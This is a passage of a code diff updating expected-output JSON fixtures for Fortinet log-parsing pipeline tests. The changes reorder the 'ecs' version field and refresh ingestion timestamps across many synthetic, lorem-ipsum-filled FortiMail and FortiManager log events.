"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-12 time=22:18:32 device_id=colabori log_id=imidestl log_part=piscing type=virus subtype=file-signature pri=high from=\"isn\" to=smod src=\"idunt [10.29.120.226]\" session_id=\"atev\" msg=\"ectio\"", "event": { - "ingested": "2021-12-09T13:37:30.096283500Z" + "ingested": "2021-12-14T14:43:09.749044330Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-1-27 time=05:21:06 device_id=atcupid log_id=onse log_part=psa type=virus_file-signature pri=high destla to=\"fugitse\" src=[10.12.86.130] session_id=dese msg=\"Attachment file (duntutla) has sha1 hash value: lamco\"", "event": { - "ingested": "2021-12-09T13:37:30.096287300Z" + "ingested": "2021-12-14T14:43:09.749044722Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-10 time=12:23:41 device_id=gna log_id=ici log_part=quamnih type=event subtype=pop3 pri=low user=iameaque ui=identsun action=deny status=aquio msg=\"rspicia\"", "event": { - "ingested": "2021-12-09T13:37:30.096292200Z" + "ingested": "2021-12-14T14:43:09.749045110Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-2-24 time=19:26:15 device_id=uiineavo log_id=sistena log_part=uidexeac type=virus subtype=infected pri=high from=\"amquisno\" to=modoc client_name=\"magnam3267.corp\" client_ip=\"10.95.32.86\" session_id=\"Bonorum\" msg=lesti", "event": { - "ingested": "2021-12-09T13:37:30.096298300Z" + "ingested": "2021-12-14T14:43:09.749045503Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-11 time=02:28:49 device_id=lupta log_id=byC log_part=imadm type=spam pri=low 
session_id=\"nci\" from=\"orroquis\" to=\"ulapa\" subject=\"iumdo\" msg=\"iusmodit\"", "event": { - "ingested": "2021-12-09T13:37:30.096304500Z" + "ingested": "2021-12-14T14:43:09.749045889Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-3-25 time=09:31:24 device_id=obeataev log_id=umf log_part=olesti type=event subtype=config pri=low user=quaeabil ui=emip module=aturQu submodule=itesse msg=\"iamqui\"", "event": { - "ingested": "2021-12-09T13:37:30.096310500Z" + "ingested": "2021-12-14T14:43:09.749046292Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-4-8 time=16:33:58 device_id=inim log_id=etdol log_part=Sed type=event subtype=pop3 pri=very-high user=tten ui=etur action=allow status=mipsumqu msg=\"eprehen\"", "event": { - "ingested": "2021-12-09T13:37:30.096316700Z" + "ingested": "2021-12-14T14:43:09.749046684Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-4-22 time=23:36:32 device_id=itaedict log_id=olorema log_part=rep type=event subtype=update pri=low msg=ptatemse", "event": { - "ingested": "2021-12-09T13:37:30.096322800Z" + "ingested": "2021-12-14T14:43:09.749047077Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-5-7 time=06:39:06 device_id=eleumi log_id=edic log_part=udexerc type=event subtype=pop3 pri=low user=olabori ui=odic action=block status=lica msg=secil", "event": { - "ingested": "2021-12-09T13:37:30.096328800Z" + "ingested": "2021-12-14T14:43:09.749047464Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-5-21 time=13:41:41 device_id=nimadmin log_id=midest log_part=modt 
type=event subtype=update pri=very-high msg=tocca", "event": { - "ingested": "2021-12-09T13:37:30.096334800Z" + "ingested": "2021-12-14T14:43:09.749047854Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-4 time=20:44:15 device_id=usant log_id=mipsumq log_part=ident type=event subtype=config pri=very-high user=sequatD ui=ercitati(10.40.89.185) module=temse submodule=caecat msg=\"cusanti\"", "event": { - "ingested": "2021-12-09T13:37:30.096340900Z" + "ingested": "2021-12-14T14:43:09.749048236Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-6-19 time=03:46:49 device_id=conseq log_id=itame log_part=tenat type=virus subtype=infected pri=very-high from=\"yCiceroi\" to=\"nostrum\" client_name=\"orroquis5179.local\" client_ip=\"10.252.96.71\" session_id=\"tvolu\" msg=\"dutper\"", "event": { - "ingested": "2021-12-09T13:37:30.096347Z" + "ingested": "2021-12-14T14:43:09.749048617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-7-3 time=10:49:23 device_id=ugiatqu log_id=eruntmo log_part=nimve type=virus subtype=infected pri=very-high from=natus to=boreet client_name=\"luptasnu757.www.home\" client_ip=\"10.174.210.232\" session_id=ovolupta msg=\"volup\"", "event": { - "ingested": "2021-12-09T13:37:30.096355800Z" + "ingested": "2021-12-14T14:43:09.749049004Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-7-17 time=17:51:58 device_id=Bonoru log_id=rcitati log_part=nula type=event subtype=imap pri=medium user=deomni ui=adipi(10.120.232.62) action=block status=ntutl msg=\"volupt\"", "event": { - "ingested": "2021-12-09T13:37:30.096362300Z" + "ingested": "2021-12-14T14:43:09.749049389Z" + }, + 
"ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-1 time=00:54:32 device_id=mquameiu log_id=loremq log_part=turmagni type=event subtype=imap pri=very-high user=emUtenim ui=ende action=block status=amnis msg=rvelil", "event": { - "ingested": "2021-12-09T13:37:30.096368400Z" + "ingested": "2021-12-14T14:43:09.749049799Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-15 time=07:57:06 device_id=rumetMa log_id=mexerci log_part=urEx type=virus subtype=file-signature pri=medium liq to=abore src=10.200.225.45 session_id=dol msg=exe", "event": { - "ingested": "2021-12-09T13:37:30.096374600Z" + "ingested": "2021-12-14T14:43:09.749050249Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-8-29 time=14:59:40 device_id=audant log_id=rspicia log_part=pitl type=statistics pri=high session_id=mmod client_name=taevit4968.mail.local client_ip=10.144.111.42 dst_ip=10.62.61.1 from=lam hfrom=asnu to=com polid=rep domain=mveni5084.internal.local mailer=num resolved=ctetura src_type=quaerat direction=inbound virus=umexer disposition=amnih classifier=tper message_length=pisciv subject=tconsect", "event": { - "ingested": "2021-12-09T13:37:30.096380700Z" + "ingested": "2021-12-14T14:43:09.749050634Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-9-12 time=22:02:15 device_id=emipsumq log_id=culpaq log_part=quamq type=event subtype=pop3 pri=medium user=emvel ui=pta(10.183.213.223) action=block status=hend msg=remagna", "event": { - "ingested": "2021-12-09T13:37:30.096386300Z" + "ingested": "2021-12-14T14:43:09.749051018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - 
"version": "1.12.0" - }, "message": "date=2018-9-27 time=05:04:49 device_id=lauda log_id=plicaboN log_part=dolo type=virus subtype=file-signature pri=medium from=\"elit\" to=sam src=\"tMal [10.52.190.18]\" session_id=isni msg=quid", "event": { - "ingested": "2021-12-09T13:37:30.096390100Z" + "ingested": "2021-12-14T14:43:09.749051400Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-11 time=12:07:23 device_id=inibus log_id=secte log_part=ctobeat type=event subtype=config pri=low user=iqui ui=animide module=pid submodule=itanimi msg=\"onoru\"", "event": { - "ingested": "2021-12-09T13:37:30.096394900Z" + "ingested": "2021-12-14T14:43:09.749051794Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-10-25 time=19:09:57 device_id=naaliq log_id=plica log_part=asiarc type=event subtype=imap pri=low user=seq ui=snula(10.203.110.206) action=deny status=dipi msg=ecatc", "event": { - "ingested": "2021-12-09T13:37:30.096400600Z" + "ingested": "2021-12-14T14:43:09.749052179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-9 time=02:12:32 device_id=dolo log_id=velites log_part=oloremi type=virus_file-signature pri=high apari to=tsunt src=\"caecat [10.108.10.197]\" session_id=enim msg=\"Attachment file (umq) has sha1 hash value: sistena\"", "event": { - "ingested": "2021-12-09T13:37:30.096405800Z" + "ingested": "2021-12-14T14:43:09.749052597Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-11-23 time=09:15:06 device_id=imipsam log_id=eumiu log_part=tatevel type=event subtype=smtp pri=high user=quisnostui=sequines(10.115.154.104) action=cancelstatus=lorumsession_id=\"suntexpl\" msg=\"DSN: to 
\u003c\u003ciqu\u003e; reason:success; sessionid:tatis\"", "event": { - "ingested": "2021-12-09T13:37:30.096410100Z" + "ingested": "2021-12-14T14:43:09.749052986Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-12-7 time=16:17:40 device_id=econ log_id=aborio log_part=rve type=event subtype=smtp pri=medium user=nbyCiui=runtmollaction=blockstatus=velillumsession_id=\"ionev\" msg=\"to=\u003c\u003cvitaedi\u003e, delay=rna, xdelay=cons, mailer=ipv6-icmp, pri=lupta, relay=olaboris3175.internal.home[10.250.94.95], dsn=tno, stat=imvenia\"", "event": { - "ingested": "2021-12-09T13:37:30.096415Z" + "ingested": "2021-12-14T14:43:09.749053368Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2018-12-21 time=23:20:14 device_id=atevelit log_id=ugitsed log_part=dminimve type=virus subtype=file-signature pri=very-high from=\"onse\" to=uiac src=tquii [10.164.49.95] session_id=emeumfu msg=\"inBCSedu\"", "event": { - "ingested": "2021-12-09T13:37:30.096421400Z" + "ingested": "2021-12-14T14:43:09.749053869Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-5 time=06:22:49 device_id=ddo log_id=emp log_part=inBC type=event subtype=smtp pri=low user=eacommui=aboNem(10.11.45.141) action=allowstatus=remasession_id=\"mcol\"msg=\"STARTTLS=tion, cert-subject=umquia, cert-issuer=lorsita, verifymsg=spici\"", "event": { - "ingested": "2021-12-09T13:37:30.096426Z" + "ingested": "2021-12-14T14:43:09.749054248Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-1-19 time=13:25:23 device_id=odit log_id=vol log_part=epteurs type=statistics pri=very-high session_id=\"cteturad\" 
client_name=\"modi6930.internal.test[10.60.164.100]\"dst_ip=\"10.161.1.146\" from=\"etconse\" to=\"nproiden\" polid=\"ionem\" domain=\"taevitae6868.www.corp\" subject=\"ehende\" mailer=\"rep\" resolved=\"nostru\" direction=\"internal\" virus=\"ipiscin\" disposition=\"trudexe\" classifier=\"qua\" message_length=modit", "event": { - "ingested": "2021-12-09T13:37:30.096430500Z" + "ingested": "2021-12-14T14:43:09.749054641Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-2 time=20:27:57 device_id=orsit log_id=deFinibu log_part=iaecons type=event subtype=admin pri=very-high user=rautod ui=onorumet(10.157.118.41) action=cancel status=chit reason=unknown msg=\"erspici\"", "event": { - "ingested": "2021-12-09T13:37:30.096434300Z" + "ingested": "2021-12-14T14:43:09.749055025Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-2-17 time=03:30:32 device_id=quidol log_id=tinv log_part=Utenima type=statistics pri=high session_id=temqu client_name=uradip7802.mail.example client_ip=10.44.35.57 dst_ip=10.93.239.216 from=vento hfrom=litsed to=ciun polid=rehender domain=tetura7106.www5.corp mailer=eosquir resolved=tqu src_type=emips direction=internal virus=tinvolu disposition=ptat classifier=amquisn message_length=Finibus subject=nsequat", "event": { - "ingested": "2021-12-09T13:37:30.096439100Z" + "ingested": "2021-12-14T14:43:09.749055422Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-3-3 time=10:33:06 device_id=evelite log_id=remquela log_part=toreve type=event subtype=update pri=high msg=\"dolor\"", "event": { - "ingested": "2021-12-09T13:37:30.096445300Z" + "ingested": "2021-12-14T14:43:09.749055809Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - 
"ecs": { - "version": "1.12.0" - }, "message": "date=2019-3-17 time=17:35:40 device_id=itse log_id=lapari log_part=Bonor type=event subtype=update pri=medium msg=exeaco", "event": { - "ingested": "2021-12-09T13:37:30.096451500Z" + "ingested": "2021-12-14T14:43:09.749056197Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-1 time=00:38:14 device_id=emvele log_id=tNeq log_part=olorsita type=virus_file-signature pri=medium eleumiu to=etdol src=\"imadmin [10.123.154.140]\" session_id=liqu msg=dolor", "event": { - "ingested": "2021-12-09T13:37:30.096457600Z" + "ingested": "2021-12-14T14:43:09.749056586Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-15 time=07:40:49 device_id=aliq log_id=utem log_part=oreetd type=event subtype=imap pri=very-high user=mremape ui=ude action=deny status=emac msg=rmagnido", "event": { - "ingested": "2021-12-09T13:37:30.096463600Z" + "ingested": "2021-12-14T14:43:09.749056960Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-4-29 time=14:43:23 device_id=pariatur log_id=cita log_part=tvo type=event subtype=admin pri=high user=rve ui=atemacc(10.141.108.1) action=deny status=ciunt reason=success msg=\"beataevi\"", "event": { - "ingested": "2021-12-09T13:37:30.096469700Z" + "ingested": "2021-12-14T14:43:09.749057341Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-5-13 time=21:45:57 device_id=imaven log_id=dmin log_part=sum type=event subtype=system pri=low user=lore ui=nim action=cancel status=edquiac msg=psamvolu", "event": { - "ingested": "2021-12-09T13:37:30.096475900Z" + "ingested": "2021-12-14T14:43:09.749057726Z" + }, + "ecs": { + "version": "1.12.0" }, 
"tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-5-28 time=04:48:31 device_id=iade log_id=tae log_part=obe type=event subtype=admin pri=medium user=ulapari ui=rittenby(10.31.31.193) action=deny status=nvol reason=unknown msg=\"luptatem\"", "event": { - "ingested": "2021-12-09T13:37:30.096482Z" + "ingested": "2021-12-14T14:43:09.749058113Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-6-11 time=11:51:06 device_id=conse log_id=ruredolo log_part=ati type=event subtype=system pri=low user=olors ui=roid(10.234.156.8) action=block status=uteiru msg=\"xer\"", "event": { - "ingested": "2021-12-09T13:37:30.096488100Z" + "ingested": "2021-12-14T14:43:09.749058533Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-6-25 time=18:53:40 device_id=nvol log_id=uame log_part=quia type=event subtype=update pri=very-high msg=\"labor\"", "event": { - "ingested": "2021-12-09T13:37:30.096494200Z" + "ingested": "2021-12-14T14:43:09.749058933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-7-10 time=01:56:14 device_id=mwritte log_id=modit log_part=quamnih type=event subtype=config pri=medium user=itanimid ui=uiin module=nibusBo submodule=iusm msg=\"nostru\"", "event": { - "ingested": "2021-12-09T13:37:30.096500300Z" + "ingested": "2021-12-14T14:43:09.749059317Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-7-24 time=08:58:48 device_id=vel log_id=preh log_part=madmini type=event subtype=update pri=high msg=edutpers", "event": { - "ingested": "2021-12-09T13:37:30.096506400Z" + "ingested": "2021-12-14T14:43:09.749059735Z" + }, + "ecs": { + "version": 
"1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-8-7 time=16:01:23 device_id=sBonoru log_id=everi log_part=squ type=virus subtype=file-signature pri=medium from=\"utla\" to=nse src=10.160.236.78 session_id=nostrude msg=\"Attachment file (rinc) has sha1 hash value: tno\"", "event": { - "ingested": "2021-12-09T13:37:30.096512600Z" + "ingested": "2021-12-14T14:43:09.749060114Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-8-21 time=23:03:57 device_id=cid log_id=nonproi log_part=dolor type=event subtype=admin pri=medium user=molli ui=oeiusm(10.244.19.62) action=accept status=nnumquam reason=unknown msg=\"tdolore\"", "event": { - "ingested": "2021-12-09T13:37:30.096518700Z" + "ingested": "2021-12-14T14:43:09.749060512Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-9-5 time=06:06:31 device_id=icta log_id=epteu log_part=nvent type=event subtype=webmail pri=high user=mquiavol ui=odiconse(10.147.52.164) action=allow status=untutl msg=ugiatnul", "event": { - "ingested": "2021-12-09T13:37:30.096524900Z" + "ingested": "2021-12-14T14:43:09.749060919Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-9-19 time=13:09:05 device_id=quaturve log_id=elaudant log_part=olup type=spam pri=high session_id=\"iacon\" client_name= \"ncu3839.www.localhost\" client_ip=\"10.201.105.58\" dst_ip=\"10.251.183.113\" from=\"ent\" to=\"ionemu\" subject=\"eseosqu\" msg=\"uptatem\"", "event": { - "ingested": "2021-12-09T13:37:30.096531Z" + "ingested": "2021-12-14T14:43:09.749064018Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-10-3 time=20:11:40 
device_id=eprehen log_id=oinB log_part=lor type=statistics pri=low session_id=\"citatio\" client_name=\"[10.209.203.156]\"dst_ip=\"10.132.139.98\" from=\"pariat\" to=\"borisnis\" direction=\"unknown\" virus=\"oremagn\" disposition=\"emagna\" classifier=\"uidolor\" message_length=remag", "event": { - "ingested": "2021-12-09T13:37:30.096535600Z" + "ingested": "2021-12-14T14:43:09.749064436Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-10-18 time=03:14:14 device_id=tiumtot log_id=ulamcola log_part=epr type=event subtype=admin pri=low user=nculpa ui=enbyCice(10.152.196.145) action=block status=uptas reason=success msg=\"iadeseru\"", "event": { - "ingested": "2021-12-09T13:37:30.096540500Z" + "ingested": "2021-12-14T14:43:09.749064831Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-1 time=10:16:48 device_id=equ log_id=turadip log_part=ataev type=virus_file-signature pri=medium from=\"oree\" to=\"nimadmi\" src=\"utaliq [10.78.38.143]\" session_id=qui msg=\"Attachment file (epteurs) has sha1 hash value: did\"", "event": { - "ingested": "2021-12-09T13:37:30.096546200Z" + "ingested": "2021-12-14T14:43:09.749065215Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-15 time=17:19:22 device_id=sunt log_id=orumSe log_part=olupta type=event subtype=update pri=very-high msg=pta", "event": { - "ingested": "2021-12-09T13:37:30.096551500Z" + "ingested": "2021-12-14T14:43:09.749065598Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-11-30 time=00:21:57 device_id=ntutlabo log_id=leumiure log_part=tasnu type=event subtype=smtp pri=high user=amquaui=tionevol(10.209.124.81) 
action=allowstatus=tobesession_id=\"ssequa\" log_part=emp msg=\"to=\u003c\u003cemoeni, delay=officiad, xdelay=veniam, mailer=igmp, pri=entoreve, relay=ion3339.www.localdomain\"", "event": { - "ingested": "2021-12-09T13:37:30.096555800Z" + "ingested": "2021-12-14T14:43:09.749065982Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2019-12-14 time=07:24:31 device_id=int log_id=oremagn log_part=rnatur type=virus pri=medium from=uptatev to=\"oditem\" src=\"10.176.31.145\" session_id=\"ineavo\" msg=reseo", "event": { - "ingested": "2021-12-09T13:37:30.096560800Z" + "ingested": "2021-12-14T14:43:09.749066375Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json index a326353e5c5..f6cba0e0da4 100644 --- a/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/fortinet/data_stream/fortimanager/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "logver=iusm devname=\"modtempo\" devid=\"olab\" vd=nto date=2016-1-29 time=6:09:59 logid=sse type=exercita subtype=der level=very-high eventtime=odoco logtime=ria srcip=10.20.234.169 srcport=1001 srcintf=eth5722 srcintfrole=vol dstip=10.44.173.44 dstport=6125 dstintf=enp0s3068 dstintfrole=nseq poluuid=itinvol sessionid=psa proto=21 action=allow policyid=ntium policytype=psaq crscore=13.800000 craction=eab crlevel=aliqu appcat=Ute service=lupt srccountry=dolore dstcountry=sequa trandisp=abo tranip=10.189.58.145 tranport=5273 duration=14.119000 sentbyte=7880 rcvdbyte=449 sentpkt=mqui app=nci", "event": { - "ingested": "2021-12-09T13:37:31.906792100Z" + "ingested": "2021-12-14T14:43:11.779383324Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-2-12 time=1:12:33 logver=litesse devid=orev devname=pisciv logid=uii type=umexe subtype=estlabo level=high vd=iatnu srcip=10.182.84.248 srcport=4880 srcintf=enp0s208 dstip=10.162.33.193 dstport=7200 dstintf=enp0s2581 poluuid=nulapari sessionid=mwritten proto=prm action=accept policyid=uidolor trandisp=nibus duration=72.226000 sentbyte=6378 rcvdbyte=3879 devtype=riosam osname=anonnu osversion=1.410 mastersrcmac=ameaqu srcmac=01:00:5e:84:66:6c crscore=145.047000 craction=squame crlevel=ntex eventtype=eius user=luptat service=emape hostname=aer445.host profile=eumiu reqtype=uame url=https://www.example.net/orisn/cca.htm?ofdeF=metcons#roinBCS direction=external msg=com method=eataevi cat=byC catdesc=tinculp device_id=tur log_id=atio pri=high userfrom=atemsequ adminprof=nci timezone=CEST main_type=eFini trigger_policy=amco sub_type=exe severity_level=iatu policy=ionofde src=10.62.4.246 src_port=189 dst=10.171.204.166 dst_port=6668 http_method=mol http_url=taspe http_host=mvolu http_agent=radip http_session_id=tNequ signature_subclass=gelit 
signature_id=6728 srccountry=tconsec content_switch_name=nsequat server_pool_name=taev false_positive_mitigation=roidents user_name=oluptas monitor_status=llu http_refer=https://api.example.org/tamremap/tur.html?radipis=isetq#estqui http_version=uasiarch dev_id=emaper threat_weight=ssitasp history_threat_weight=eum threat_level=sum ftp_mode=uaerat ftp_cmd=boreet cipher_suite=onev msg_id=tenima", "event": { - "ingested": "2021-12-09T13:37:31.906800400Z" + "ingested": "2021-12-14T14:43:11.779386908Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=seq dtime=2016-02-26 20:15:08.252538723 +0000 UTC devid=olorema devname=ccaecat vd=veleumi date=2016-2-26 time=8:15:08 logid=tia type=enim subtype=dqu level=medium eventtime=uian logtime=tempo srcip=10.200.188.142 srcport=4665 srcintf=eth4496 srcintfrole=eetd dstip=10.94.103.117 dstport=513 dstintf=enp0s3491 dstintfrole=doloreeu poluuid=pori sessionid=occ proto=icmp action=allow policyid=reetdolo policytype=nrepreh crscore=18.839000 craction=uiano crlevel=mrema appcat=autfu service=natura srccountry=aboris dstcountry=ima trandisp=tanimi tranip=10.15.159.80 tranport=6378 duration=121.916000 sentbyte=6517 rcvdbyte=13 sentpkt=ugiatqu app=eacomm", "event": { - "ingested": "2021-12-09T13:37:31.906804Z" + "ingested": "2021-12-14T14:43:11.779387380Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "logver=liqu devname=\"lorem\" devid=\"emq\" vd=isiu date=2016-3-12 time=3:17:42 logid=nimadmi type=iatisu subtype=iat level=low eventtime=suntinc logtime=elits srcip=10.131.233.27 srcport=5037 srcintf=eth3676 srcintfrole=eataevit dstip=10.50.112.141 dstport=7303 dstintf=eth3391 dstintfrole=olab poluuid=mquisnos sessionid=loremagn proto=1 action=cancel policyid=tsed policytype=orai crscore=61.614000 craction=incididu crlevel=eci appcat=aali service=ametcons 
srccountry=porainc dstcountry=amquisno trandisp=iinea tranip=10.27.88.95 tranport=776 duration=5.911000 sentbyte=1147 rcvdbyte=3269 sentpkt=tvol app=moll", "event": { - "ingested": "2021-12-09T13:37:31.906808800Z" + "ingested": "2021-12-14T14:43:11.779387763Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "date=2016-3-26 time=10:20:16 logver=inim devid=ema devname=roinBCSe logid=onse type=tae subtype=tatno level=very-high vd=oluptate srcip=10.52.54.178 srcport=4427 srcintf=lo1567 dstip=10.37.58.155 dstport=2430 dstintf=eth6096 poluuid=ciati sessionid=ercit proto=3 action=allow policyid=eniam trandisp=reetdolo duration=165.411000 sentbyte=7651 rcvdbyte=3982 devtype=rumet osname=oll osversion=1.5670 mastersrcmac=nido srcmac=01:00:5e:c3:0a:41 crscore=71.955000 craction=itlabori crlevel=Ciceroi eventtype=aveniam user=uradi service=nimadmin hostname=olo7148.mail.home profile=snulapar reqtype=aedic url=https://api.example.com/iumto/aboreetd.gif?dun=enim#saute direction=internal msg=eriame method=lorema cat=avol catdesc=labor device_id=atuse log_id=ddoeiu pri=high userfrom=idolore adminprof=onse timezone=PST main_type=tation trigger_policy=ips sub_type=emeumfug severity_level=upta policy=omn src=10.87.212.179 src_port=1758 dst=10.157.213.15 dst_port=3539 http_method=ali http_url=nsect http_host=ntutl http_agent=caecatc http_session_id=onsequat signature_subclass=siuta signature_id=2896 srccountry=loru content_switch_name=ema server_pool_name=par false_positive_mitigation=itaut user_name=rveli monitor_status=rsint http_refer=https://example.com/idestla/Nemoeni.htm?taed=lup#remeumf http_version=antiumto dev_id=strude threat_weight=ctetura history_threat_weight=usmod threat_level=edqui ftp_mode=mquidol ftp_cmd=ita cipher_suite=ipi msg_id=rsitamet", "event": { - "ingested": "2021-12-09T13:37:31.906814500Z" + "ingested": "2021-12-14T14:43:11.779388223Z" + }, + "ecs": { + "version": "1.12.0" 
